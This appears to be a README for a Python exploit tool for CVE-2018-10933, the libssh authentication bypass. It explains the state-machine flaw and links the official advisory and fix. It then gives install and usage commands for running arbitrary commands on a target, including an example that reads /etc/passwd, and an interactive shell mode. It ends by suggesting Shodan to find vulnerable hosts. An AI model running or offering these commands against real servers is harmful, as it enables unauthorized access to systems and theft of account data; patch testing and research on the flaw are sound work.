A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
The issue comes from the way libssh doesn't maintain state for the authentication and how this can be used to bypass the authentication. Basically, think of the connection as a multi-step process: step1, step2, step3... Since libssh doesn't enforce the order of the steps, you can basically jump to step3 without going through step1 and step2.
Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.
Exploit-DB : https://www.exploit-db.com/exploits/45638
Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
sudo apt-get install python3
gh repo clone EmmanuelCruzL/CVE-2018-10933
pip3 install -r requirements.txt
python3 main.py
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host
Script for the vulnerabilities CVE-2018-10933
positional arguments:
host the ip or domain address of ssh server
options:
-h, --help show this help message and exit
-p PORT, --port PORT The port the service ssh, default [22]
-log, --logfile Logfile to write conn logs
-t, --test check the version of libSSH
-c COMMAND, --command COMMAND
command to execute
-i, --interactive open the interactive mode
python3 main.py 0.0.0.0 -port 22 -t
python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"
python3 main.py 0.0.0.0 -p 22 -l
[!] can find devices vulnerables using shodan.io
- ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )